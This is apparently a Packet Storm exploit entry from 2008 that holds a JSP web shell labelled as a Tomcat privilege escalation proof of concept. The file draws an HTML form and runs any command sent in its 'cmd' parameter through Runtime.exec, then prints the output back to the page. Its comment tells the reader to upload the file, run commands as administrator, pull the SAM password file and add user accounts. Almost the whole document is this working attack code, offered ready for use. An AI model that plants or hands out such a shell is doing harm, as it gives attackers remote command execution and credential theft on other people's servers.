tomcat-escalate.txt

2008-11-29T00:00:00
ID PACKETSTORM:72371
Type packetstorm
Reporter Abysssec
Modified 2008-11-29T00:00:00

Description

                                        
                                            `<%@ page import="java.util.*,java.io.*"%>  
<%  
%>  
  
<%--  
abysssec inc public material  
  
just upload this file with abysssec.jsp and execute your command  
your command will run as administrator . you can download sam file  
add user or do anything you want .  
note : please be gentle and don't obstructionism .  
vulnerability discovered by : abysssec.com  
  
--%>  
<HTML><BODY bgcolor=#0000000 and text=#DO0000>  
<title> Abysssec inc (abysssec.com) JSP vulnerability </tile>  
<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Execute !">  
</FORM>  
<pre>  
<%  
if (request.getParameter("cmd") != null) {  
out.println("Command: " + request.getParameter("cmd") + "<BR>");  
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));  
OutputStream os = p.getOutputStream();  
InputStream in = p.getInputStream();  
DataInputStream dis = new DataInputStream(in);  
String disr = dis.readLine();  
while ( disr != null ) {  
out.println(disr);   
disr = dis.readLine();   
}  
}  
%>  
</pre>  
</BODY></HTML>  
  
`